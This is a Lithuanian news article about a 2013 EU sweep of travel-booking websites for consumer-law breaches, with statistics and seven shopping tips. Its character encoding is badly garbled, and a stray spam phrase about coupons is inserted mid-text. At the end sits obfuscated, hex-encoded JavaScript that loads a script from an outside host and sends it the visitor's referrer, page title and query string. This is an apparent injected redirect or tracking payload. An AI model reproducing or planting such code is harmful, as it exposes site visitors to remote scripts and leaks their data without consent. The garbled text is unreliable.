Akyliau saugos uA?sisakanA?iA?jA? atostogas internetu teises

Flickr.com nuotr.

NacionalinA�s vartotojA? apsaugos institucijos A�mA�si bendrA? veiksmA?, kuriuos koordinavo Europos Komisija, ir 2013 m. patikrino 552 svetaines. Rezultatai apstulbino a�� Europos vartotojA? teisA�s nepaisyta net 382 svetainA�se.

Imtasi ryA?tingA? vykdymo uA?tikrinimo veiksmA?, ir 62 proc. patikrintA? svetainiA? su vartotojais dabar elgiasi taip, kaip turA�tA?. Likusiems 38 proc. gresia papildomos sankcijos, nes Europos institucijos A�mA�si tolesniA? veiksmA?, kad uA?tikrintA?, jog bA�tA? visapusiA?kai laikomasi vartotojA? teisiA?.

a�zKas treA?ias Europos SA�jungos vartotojas kelionA� ir apgyvendinimA� uA?sisako internetu. Jie turi teisA� bA�ti tikri, kad tai saugu ir patikima. IA? 552 patikrintA? kelioniA? svetainiA? 62 proc. dabar laikosi ES vartotojA? teisA�s aktA? a�� to pasiekA�me bendromis valstybiA? nariA? ir Komisijos pastangomis. Nenurimsiu, kol vartotojA? teisA�s bus visapusiA?kai uA?tikrintos, ir to sieksiu naudodamasis turimomis priemonA�misa�?,a�� sakA� uA? vartotojA? politikA� atsakingas Europos Komisijos narys Nevenas Mimica.

BendrA� svetainiA? patikrA� (dar vadinamA� A?aibo operacija, angl. sweeps) paprastai koordinuoja Europos Komisija, o atlieka vykdo nacionalinA�s vykdymo uA?tikrinimo institucijos, kad nustatytA? vartotojA? teisA�s paA?eidimus ir uA?tikrintA?, kad jos bA�tA? laikomasi. 2013 m. vasarA� nacionalinA�s institucijos patikrino prekiautojA? ir tarpininkA? svetaines, kuriose parduodamos kelionA�s lA�ktuvu ir apgyvendinimas vieA?buA?iuose. IA? viso patikrintos 552 svetainA�s.

Atlikusios pradinius ir pakartotinius patikrinimus nacionalinA�s institucijos nustatA�, kad iA? viso 382 svetainA�se nesilaikyta ES vartotojA? teisA�s ir kad tik 31 proc. patikrintA? svetainiA? atitiko ES taisykles. Po to nacionalinA�s institucijos susisiekA� su reikalavimA? neatitinkanA?ias svetaines valdanA?iomis nacionalinA�mis A?monA�mis, kad tos svetainA�s bA�tA? suderintos su ES vartotojA? teise, o dA�l kitose valstybA�se narA�se A?sisteigusiA? bendroviA? papraA?A� atitinkamos valstybA�s narA�s pagalbos. A�iuo metu pataisytos 173 svetainA�s, tad iA? visA? patikrintA? svetainiA? reikalavimus dabar atitinka 62 proc. 209 svetainA�ms taikomos tolesnA�s procedA�ros, iA? jA? 52 svetaines prekiautojai A?sipareigojo pataisyti.

Lietuvoje patikrinta 16 internetiniA? svetainiA?: reikalavimus atitiko 11 svetainiA?, o paA?eidimA? nustatyta – 5 svetainA�ms, iA? kuriA? 1 svetainA� po pakartotinio patikrinimo atitiko reikalavimus. 11 svetainiA? bus taikomos tolesnA�s procedA�ros.

Kas konkreA?iai patikrinta?

SvetainA�s tikrintos siekiant nustatyti, ar lengva gauti informacijA� apie svarbiausius paslaugA? ypatumus, ar kaina nurodoma pradiniame etape ir ar A? jA� A?traukti neprivalomi priedai, ar svetainA�se pateikiami e. paA?to adresai, kuriais bA�tA? galima pateikti klausimA� ar pareikA?ti skundA�. Taip pat patikrinta, ar svetainA�se prieA? perkant supaA?indinama su pirkimo sA�lygomis ir ar jos aiA?kios ir lengvai suprantamos. Nustatytos toliau iA?vardytos pagrindinA�s problemos.

TrA�ksta privalomos informacijos apie prekiautojo tapatybA�, ypaA? jo e. paA?to adreso, taigi vartotojams nesuteikta veiksmingo bA�do susisiekti. Tokios informacijos nebuvo 162 svetainA�se (30 proc.).

TrA�ksta aiA?kiA? instrukcijA?, kaip pateikti skundA�. Tokios informacijos nebuvo 157 svetainA�se (28 proc.).

Nesuteikta galimybA�s laisvai pasirinkti neprivalomus priedus, kaip antai mokestA? uA? bagaA?A�, draudimo mokestA?, A?laipinimo pirmenybA�. A�i problema nustatyta 133 svetainA�se (24 proc.).

IA? karto nenurodyta bendra paslaugos kaina, pirmA�kart iA?vardijant pagrindinius uA?sakymo elementus. Tokios informacijos nepateikA� 112 svetainiA? (20 proc.).

DA�l 209 reikalavimA? vis dar neatitinkanA?iA? svetainiA? imtasi tolesniA? administraciniA? arba teisiniA? nacionalinio lygmens procedA�rA?. Be to, toliau perA?iA�rima tam tikra kelioniA? sektoriaus praktika, kad vartotojai gautA? visA� reikalingA� informacijA�. do goodrx coupons work.

7 patarimai perkantiems keliones internetu:

Kaip susisiekti su pardavA�ju? Pasitikrinkite, ar pardavA�jas nurodA� savo pavadinimA�, paA?to adresA�, e. paA?tA�. Jei paslaugas perkate per tarpininkA�, A?sitikinkite, kad gausite ne tik tarpininko, bet ir oro veA?A�jo ar vieA?buA?io kontaktinius duomenis.

Ar turite visA� reikiamA� informacijA� apie kelionA� lA�ktuvu ar vieA?butA?? Pasitikrinkite, ar jums suteikta reikiama informacija apie kelionA� (marA?rutA�, laikA�) ir oro veA?A�jA�, taip pat apie vieA?buA?io pavadinimA� ir adresA�.

Kiek viskas kainuos? Atkreipkite dA�mesA? A? galutinA� kainA�. Ji gali bA�ti didesnA� nei nurodytoji iA? pradA?iA? arba reklamoje, nes A? galutinA� kainA� gali bA�ti A?traukti papildomi mokesA?iai. Papildomi mokesA?iai perkant internetu turi bA�ti nurodyti aiA?kiai, o ne iA? anksto paties pardavA�jo varnele paA?ymA�tuose langeliuose.

Ar turiu teisA� susigrA�A?inti pinigus? Atkreipkite dA�mesA?, kad daA?nai negalima atA?aukti savo kelionA�s, uA?sakytos nemokamai. Pasitikrinkite, ar pardavA�jas pateikA� informacijos apie bilietA? ir vieA?buA?iA? atA?aukimo sA�lygas.

Ar lengva rasti pirkimo sA�lygas? Turi bA�ti galimybA� atsispausdinti ar kitaip iA?sisaugoti pirkimo sA�lygas ne vA�liau kaip prieA? pat paslaugA? A?sigijimA�.

IA?kilo problemA?? Nedelsdami apie jas praneA?kite nurodytam kontaktiniam asmeniui, pavyzdA?iui, kai vieA?butis neatitinka nurodytojo uA?sakyme. Jei tai nepadeda, galite kreiptis A? vartotojA? apsaugos organizacijA� ar kompetentingA� valdA?ios institucijA�. Jei iA?kilo problemA? dA�l pardavA�jo kitoje ES valstybA�je, galite kreiptis A? Lietuvoje esantA? Europos vartotojA? centrA�.

AtidA�jo ar atA?aukA� skrydA?? Kaip keleivis, turite konkreA?ias teises tokiais atvejais. Daugiau apie jas a�� interneto puslapyje http://ec.europa.eu/consumers/ecc/consumer_topics/air_travel_en.htm

var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}